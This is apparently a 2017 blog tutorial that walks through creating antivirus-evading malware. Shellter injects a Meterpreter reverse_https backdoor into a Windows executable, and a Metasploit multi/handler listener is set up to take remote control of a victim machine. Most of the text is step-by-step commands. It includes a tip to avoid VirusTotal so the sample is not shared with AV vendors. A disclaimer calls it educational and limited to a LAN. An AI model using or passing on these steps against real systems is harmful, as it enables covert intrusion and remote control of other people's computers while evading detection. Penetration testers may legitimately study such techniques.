It's 2017 and traditional Antivirus solutions are becoming more and more obsolete with every passing day. The rise of exploit kits and "do it yourself malware" means that organizations can no longer rely solely on Antivirus solutions to keep them safe. In fact, someone with little experience can now make a unique piece of malware that is capable of evading the majority, if not all traditional Antivirus solutions.This is a guide aimed at all skill levels, from students to professional penetration testers
, and aims to show how anyone can create their own unique piece of Malware (capable of evading AV) that gives them remote access to a machine by using Metasploit
, and Shellter.Disclaimer: This guide is for educational purposes only, and can be used on a Local Area Network (LAN) to demonstrate how easily a workstation can be compromised without an organization being aware. This guide is limited to a LAN and does not detail how to set up port forwarding from public IP's to Private IP's, command and control servers, or how to configure firewalls. This is largely unnecessary for isolated demonstrations; however, if enough interest is shown I may add this to another guide. No warranty is provided on the accuracy of this guide and it is provided strictly as is. I will not go into what all of the commands are performing in this particular tutorial, but depending on the community response I will look to explain it more in depth in another post.Meterpreter and ShellterCreating the backdoor
Setting up your Kali listener and handler
- Elevate to root and download Shellter - Open a terminal and type:sudo suapt-get install shellter
- Find a 32 bit executable vulnerable to PE Injection (the uninstall files found after installing a program work well). Copy this to your Kali Desktop.
- Change directory and run Shellter – in the same terminal type:cd Desktop shellter &
- Under Operation mode select automatic and choose your executable target – type:a<Filename of Vulnerable 32 bit executable>
- The program will attempt to find an entry point for the backdoor, if the program throws errors and fails, find a different executable to use.
- Under Enable Stealth mode – type:Y to attempt to preserve original .exe functionality (Not recommended if you used an uninstall executable)ORN to strip the programs original functionality and just run as a backdoor.
- Under Payloads – type:L followed by a number to use a native Meterpreter BackdoorORC to use a custom script
- Find out your local IP Address – Open your existing terminal and type:Ifconfig
- Note your local IP address i.e. 192.168.218.128 (denoted next to ‘inet’)
- Set the destination IP for the payload – Return to Shellter and type:<Local IP Address><Local Port to run on i.e. 8080>
- You will see Injection: Verified!
At this stage, you are halfway there and can copy your created malware to a USB or the like.Note
– This is also your chance to scan it with AV, but I warn you, do not use VirusTotal.com!
because VirusTotal.com distributes the sample to AntiVirus vendors and before too long it’ll be detected. An alternative solution such as nodistribute.com
will allow you to test it against a large variety of commonly used AV companies without the risk of it being analyzed and added to their list of known signatures.After you have a coffee or some tea to perk you up, let's continue with the lesson.
- Run the Metasploit framework - Open your existing terminal and type:msfconsole
- Run the Metasploit handler – type:use exploit/multi/handler
- Set up your handler with the related exploit set on your backdoor – e.g. type:set payload windows/meterpreter/reverse_httpsset lport <local port to run on i.e. 8080> set lhost <Local IP Address>
- Run your listener and handler – type:exploit
- This will now create your meterpreter console. Ensure your victim machine is on the same network as you and is within the same broadcast range. Run the infected executable on the victim machine.
At this stage, you should have established a connection to your victim machine and will retain this connection so long as they are running the infected executable. There are many actions that can be performed (and should be performed) upon gaining remote access.Thank you for taking the time to read through this guide, if you would like to learn more about what occurs when commands are issued, how to remain persistent after gaining access, or what further actions can be taken upon gaining access, feel free to let me know so that I can make another posting. If you've found this informative and wish to tip Cybytes please feel free, but it is not a requirement.Until next time...